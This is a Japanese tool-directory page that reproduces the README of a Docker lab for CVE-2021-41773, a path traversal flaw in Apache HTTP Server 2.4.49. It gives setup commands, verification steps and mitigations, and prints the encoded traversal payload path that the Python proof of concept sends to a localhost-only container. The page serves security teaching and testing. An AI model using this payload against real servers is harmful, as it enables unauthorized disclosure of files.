Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41773-Apache-Lab — カスタムPython PoCを使用し、制御されたパストラバーサルとファイル開示によってCVE-2021-41773 (Apache HTTP Server 2.4.49) を再現するためのDockerベースのラボ。 | Kitploit
ツール/GitHubGitHub/s-amnajafri/cve-2021-41773-apache-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育ラボと実践
GitHubs-amnajafri/cve-2021-41773-apache-lab

CVE-2021-41773-Apache-Lab

カスタムPython PoCを使用し、制御されたパストラバーサルとファイル開示によってCVE-2021-41773 (Apache HTTP Server 2.4.49) を再現するためのDockerベースのラボ。

リポジトリを見る
127日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41773 — Apache HTTP Server 2.4.49 ラボ

Apache HTTP Server 2.4.49 のパストラバーサル脆弱性 CVE-2021-41773 の再現。

このプロジェクトは、Docker を使用して隔離された脆弱な環境を作成し、Python の PoC を使用して制御されたファイル開示を実証します。

安全上の注意: この PoC は localhost、127.0.0.1、または ::1 のターゲットのみを受け付けます。テストは隔離されたラボ内でのみ実施してください。

目的

このプロジェクトは以下を実証します:

  • Docker で Apache HTTP Server 2.4.49 をセットアップする
  • 脆弱な Apache バージョンの検証
  • CVE-2021-41773 の再現
  • 制御されたファイル開示の実証
  • カスタム Python PoC の開発
  • エクスプロイト証跡の収集
  • 緩和策の文書化

このデモンストレーションは、リモートコード実行ではなく ファイル開示 に焦点を当てています。

プロジェクト構成

root@kitploit:~
CVE-2021-41773-Apache-Lab/
│
├── docker/
│   ├── Dockerfile
│   ├── httpd-vulnerable.conf
│   └── secret.txt
│
├── exploit/
│   └── exploit.py
│
├── screenshots/
│   ├── 01-docker-container.png
│   ├── 02-apache-version.png
│   └── 03-successful-exploit.png
│
├── report/
│   └── CVE-2021-41773-Exploit-Report.pdf
│
├── requirements.txt
├── .gitignore
└── README.md

要件

  • Docker
  • Python 3.x
  • Git

PoC は Python の標準ライブラリのみを使用し、サードパーティ製の Python パッケージを必要としません。

ラボのセットアップ

1. Docker イメージをビルドする

リポジトリのルートディレクトリから実行:

root@kitploit:~
docker build -t cve-2021-41773-lab ./docker

2. 脆弱な Apache サーバーを起動する

root@kitploit:~
docker run --rm --name cve-2021-41773-lab \
  -p 127.0.0.1:8080:80 \
  cve-2021-41773-lab

このターミナルは実行したままにしてください。

Apache サービスは次のアドレスでのみ公開されます:

root@kitploit:~
127.0.0.1:8080

検証

コンテナを確認する

別のターミナルで:

root@kitploit:~
docker ps

コンテナに次の表示が確認できるはずです:

root@kitploit:~
127.0.0.1:8080->80/tcp

Apache のバージョンを確認する

root@kitploit:~
docker exec cve-2021-41773-lab httpd -v

期待される出力:

root@kitploit:~
Server version: Apache/2.4.49 (Unix)

通常の HTTP アクセスを確認する

root@kitploit:~
curl http://127.0.0.1:8080/

Apache のテストページが返されるはずです。

エクスプロイト

PoC は次の場所にあります:

root@kitploit:~
exploit/exploit.py

実行:

root@kitploit:~
python3 exploit/exploit.py

デフォルトのターゲットは:

root@kitploit:~
http://127.0.0.1:8080

デフォルトの証明ファイルは:

root@kitploit:~
/lab/secret.txt

実行が成功すると、次の出力が得られます:

root@kitploit:~
[+] Vulnerability reproduced.
[+] Controlled file disclosure confirmed.

その後、PoC は制御されたラボファイルの内容を表示します。

PoC の仕組み

PoC はまず、ターゲットがローカルアドレスであることを確認します:

root@kitploit:~
localhost
127.0.0.1
::1

次に、エンコードされたトラバーサルコンポーネントを含むパスを構築します:

root@kitploit:~
/cgi-bin/.%2e/.%2e/.%2e/.%2e/lab/secret.txt

リクエストは Python の標準 socket モジュールを使用して送信されます。これにより、PoC は HTTP リクエストパスを直接制御できます。

脆弱な Apache 2.4.49 サーバーは細工されたパスを処理し、次のファイルの内容を返します:

root@kitploit:~
/lab/secret.txt

このファイルを取得できることで、パストラバーサルと制御されたファイル開示が確認されます。

脆弱性の概要

CVE: CVE-2021-41773

製品: Apache HTTP Server

実証した影響を受けるバージョン: 2.4.49

脆弱性の種類: パストラバーサル / ファイル開示

CVE-2021-41773 は、Apache HTTP Server 2.4.49 のパストラバーサル脆弱性です。特別に細工された URL により、意図されたパス制限を回避し、想定されたディレクトリ外のファイルへのアクセスが可能になります。

特定の構成では、この脆弱性はより深刻な影響を及ぼす可能性があります。このプロジェクトは、隔離された Docker 環境における制御されたファイル開示を意図的に実証するものです。

証跡

テスト中に収集したスクリーンショットは次の場所に保存されます:

root@kitploit:~
evidence/

証跡には以下が含まれます:

  1. 実行中の Docker コンテナ
  2. Apache HTTP Server 2.4.49 のバージョン検証
  3. Python PoC の実行成功

緩和策

主な緩和策は、Apache HTTP Server を修正済みバージョンにアップグレードすることです。

追加の防御策は以下のとおりです:

  • Apache を定期的にパッチ適用する。
  • 機密ファイルへのアクセスを制限する。
  • Alias および CGI の構成を見直す。
  • 最小権限のアクセス許可を適用する。
  • 不要なサービスを公開しない。
  • 不審なパストラバーサルリクエストがないかサーバーログを監視する。

参考情報

  • Apache HTTP Server セキュリティ勧告: https://httpd.apache.org/security/vulnerabilities_24.html

  • NIST 国家脆弱性データベース: https://nvd.nist.gov/vuln/detail/CVE-2021-41773

  • CERT-EU セキュリティ勧告: https://cert.europa.eu/publications/security-advisories/2021-054/

免責事項

このプロジェクトは、許可されたセキュリティ教育および管理されたラボテストのみを目的としています。

Docker 環境と PoC はローカルテスト用に設計されています。自分が所有していない、または評価する明示的な許可を得ていないシステムに対して PoC を使用しないでください。

ツールをダウンロード